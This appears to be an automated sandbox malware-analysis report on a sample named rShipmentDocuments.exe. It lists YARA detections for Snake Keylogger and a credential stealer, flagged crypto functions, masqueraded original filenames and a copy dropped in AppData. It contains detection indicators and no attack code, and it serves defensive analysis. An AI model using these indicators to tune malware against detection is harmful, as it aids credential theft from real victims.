Source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: rShipmentDocuments.exe
Detected potential crypto function
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 0_2_0177E06C 0_2_0177E06C
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 0_2_058D9518 0_2_058D9518
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 0_2_058DA8B0 0_2_058DA8B0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 0_2_058DA8C0 0_2_058DA8C0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3D278 9_2_02A3D278
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A35362 9_2_02A35362
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3A088 9_2_02A3A088
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A37118 9_2_02A37118
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3C148 9_2_02A3C148
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3C738 9_2_02A3C738
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3C468 9_2_02A3C468
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3CA08 9_2_02A3CA08
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A369B0 9_2_02A369B0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3E988 9_2_02A3E988
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3CFAA 9_2_02A3CFAA
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3CCD8 9_2_02A3CCD8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A329E0 9_2_02A329E0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3F961 9_2_02A3F961
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3E97A 9_2_02A3E97A
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A33E09 9_2_02A33E09
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F9C18 9_2_068F9C18
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FFC68 9_2_068FFC68
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F2288 9_2_068F2288
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F1BA8 9_2_068F1BA8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FF3B8 9_2_068FF3B8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F9328 9_2_068F9328
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F0B30 9_2_068F0B30
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F5028 9_2_068F5028
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F2970 9_2_068F2970
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FE6A0 9_2_068FE6A0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FE6B0 9_2_068FE6B0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FDE00 9_2_068FDE00
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FEF51 9_2_068FEF51
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FEF60 9_2_068FEF60
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FCCA0 9_2_068FCCA0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FDDFF 9_2_068FDDFF
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F9548 9_2_068F9548
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FD540 9_2_068FD540
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FD550 9_2_068FD550
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FEAF8 9_2_068FEAF8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FE24A 9_2_068FE24A
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FE258 9_2_068FE258
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F2278 9_2_068F2278
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F8BA0 9_2_068F8BA0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FEB08 9_2_068FEB08
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F0B20 9_2_068F0B20
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F1B77 9_2_068F1B77
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FD0E9 9_2_068FD0E9
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FD0F8 9_2_068FD0F8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F0007 9_2_068F0007
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FF802 9_2_068FF802
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F5018 9_2_068F5018
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FF810 9_2_068FF810
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F0040 9_2_068F0040
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FD999 9_2_068FD999
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FD9A8 9_2_068FD9A8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_0094E06C 10_2_0094E06C
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_04CE9518 10_2_04CE9518
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_04CEA8C0 10_2_04CEA8C0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_04CEA8B0 10_2_04CEA8B0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069CC2E0 10_2_069CC2E0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C1998 10_2_069C1998
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C66D0 10_2_069C66D0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C4660 10_2_069C4660
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C4ED0 10_2_069C4ED0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C4A98 10_2_069C4A98
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C4A88 10_2_069C4A88
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C1A4A 10_2_069C1A4A
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C6B08 10_2_069C6B08
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C1989 10_2_069C1989
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_03035362 16_2_03035362
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303D278 16_2_0303D278
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_03037118 16_2_03037118
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303C146 16_2_0303C146
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303A088 16_2_0303A088
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303C738 16_2_0303C738
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303C468 16_2_0303C468
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303CA08 16_2_0303CA08
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303E988 16_2_0303E988
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_030369A0 16_2_030369A0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303CFA9 16_2_0303CFA9
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303CCD8 16_2_0303CCD8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_03033AA1 16_2_03033AA1
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303F961 16_2_0303F961
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303E97A 16_2_0303E97A
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_030339EE 16_2_030339EE
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_030329EC 16_2_030329EC
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_03033E09 16_2_03033E09
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D81E80 16_2_06D81E80
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8F3B8 16_2_06D8F3B8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D817A0 16_2_06D817A0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D80B30 16_2_06D80B30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D89C70 16_2_06D89C70
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8FC68 16_2_06D8FC68
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D85028 16_2_06D85028
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D89548 16_2_06D89548
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D82968 16_2_06D82968
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8EAF8 16_2_06D8EAF8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8E6B0 16_2_06D8E6B0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8E6AF 16_2_06D8E6AF
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8E258 16_2_06D8E258
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8E249 16_2_06D8E249
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D81E70 16_2_06D81E70
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8DE00 16_2_06D8DE00
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D89BFB 16_2_06D89BFB
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D88B91 16_2_06D88B91
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8178F 16_2_06D8178F
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D88BA0 16_2_06D88BA0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8EF51 16_2_06D8EF51
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8EF60 16_2_06D8EF60
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8EB08 16_2_06D8EB08
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D89328 16_2_06D89328
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D80B20 16_2_06D80B20
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8D0F8 16_2_06D8D0F8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8CCA0 16_2_06D8CCA0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D80040 16_2_06D80040
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8501F 16_2_06D8501F
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8F810 16_2_06D8F810
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8F801 16_2_06D8F801
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D80007 16_2_06D80007
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8DDFF 16_2_06D8DDFF
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8D999 16_2_06D8D999
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8D9A8 16_2_06D8D9A8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8D550 16_2_06D8D550
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8D540 16_2_06D8D540
Sample file is different than original file name gathered from version info
Source: rShipmentDocuments.exe, 00000000.00000002.1735749873.0000000007DB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000000.00000000.1674316077.0000000000F64000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameYGc.exe6 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000000.00000002.1736191962.0000000009214000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000000.00000002.1728733569.0000000003327000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000000.00000002.1726790229.00000000013FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000009.00000002.4134998750.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000446000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe Binary or memory string: OriginalFilenameYGc.exe6 vs rShipmentDocuments.exe
Uses 32bit PE files
Source: rShipmentDocuments.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.4134245226.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: rShipmentDocuments.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ZOlmYtPdlO.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
